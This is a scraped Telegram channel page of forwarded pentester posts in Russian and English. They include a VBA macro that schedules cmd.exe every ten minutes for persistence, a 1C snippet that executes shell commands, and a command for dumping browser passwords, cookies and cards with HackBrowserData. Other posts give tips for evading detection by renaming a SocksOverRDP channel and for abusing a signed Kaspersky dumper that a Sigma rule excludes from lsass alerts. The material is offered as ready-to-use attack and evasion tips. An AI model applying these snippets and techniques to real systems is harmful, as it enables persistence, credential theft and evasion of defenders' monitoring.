Pentester`s Notes – Telegram
Pentester`s Notes
186 subscribers
47 photos
2 videos
31 files
136 links
Download Telegram
Forwarded from Миша
хм, а если вот так как-нибудь?

Sub CreateScheduledTask()
Dim shell As Object
Dim TaskName As String
Dim Command As String
Dim RunTime As String
TaskName = "MyCmdTask"

Command = "cmd.exe"

RunTime = "*/10 * * * *"

Set shell = CreateObject("WScript.Shell")

shell.Run "schtasks /Create /SC MINUTE /MO 10 /TN """ & TaskName & """ /TR " & Command, , True

Set shell = Nothing

End Sub
Forwarded from Offensive Xwitter
😈 [ LuemmelSec @theluemmel ]

One Box To Rule Them All

Little write up of my way to tackle remote pentesting situations with a dropbox.

This is about non covert systems that will allow you to carry out full fledged pentests when implanted into the customers network.

🔗 https://luemmelsec.github.io/One-Box-To-Rule-Them-All/

🐥 [ tweet ]
Forwarded from Cybred
https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8

Таблица, отдельные скриншоты которой гуляют по разным чатам. Рекомендуемые коробки для подготовки к сдаче экзаменов от OffSec: PEN-200 (OSCP), PEN-300 (OSEP) и WEB-300 (OSWE).

И актуальная (последнее видео вышло 11 дней назад) серия видео с развертыванием и решением похожей локальной лаборатории: OSCP Practice Lab: Active Directory Attack Path #1, #2, #3.
Forwarded from Cybred
https://github.com/moonD4rk/HackBrowserData

HackBrowserData это инструмент командной строки, который умеет расшифровывать и экспортировать данных из 18 браузеров на Windows, MacOS и Linux.

Извлекаемые данные:
— сохраненные пароли
— история браузера
куки пользователя
кредитные карты
история скачиваний
список расширений
localStorage
закладки

Пример использования:
hack-browser-data.exe -b chrome -f json -dir results -cc


На замену SharpChromium.
Pentester`s Notes pinned «https://habr.com/ru/companies/angarasecurity/articles/680138/»
Forwarded from hidden account
Коллеги, собрал все известные мне внешние обработки для исполнения кода в 1с. Бывает, что одна работает, другая нет. И наоборот
#1c #1с #rce
Forwarded from hidden account
Для 1с_rce нужно код вставить
Forwarded from Pentester`s Notes
shell=New COMObject("WScript.Shell");
e=shell.Exec("whoami");
Сообщить(e.StdOut.ReadAll());

#1c #1с #rce 1c rce
В ближайшее время планирую обработать исходный код этих обработок и собрать в одну универсальную, с возможностью выбора той или иной. Над реализацией ещё подумаю
Надо будет потестить, возможно стабильнее, чем rdp2tcp
Forwarded from true_security
Крутая тулза для организации socks через rdp соединение, работает практически без детектов. https://github.com/nccgroup/SocksOverRDP

Обратить внимание на строку:
#define SocksOverRDP_CHANNEL_NAME "SocksChannel"
Ну вы поняли☺️
Forwarded from 1N73LL1G3NC3
GTFONow

Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries using GTFOBins.
Forwarded from true_security
Сегодня в одном чате ребята обсуждали написание статьи про Lolbins.
Вот вам один интересный lolbas - C:\Program Files (x86)\Kaspersky Lab\NetworkAgent\kldumper.exe
описание - https://support.kaspersky.ru/common/diagnostics/7641
преза от ЛК, где предлагается сигма правило с исключением данного бинаря из сработки по дампу lsass - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

у kldumper.exe цифровая подпись ЛК. lsass им не дампил еще, но другие процессы дампит ок (при наличии прав лок админа)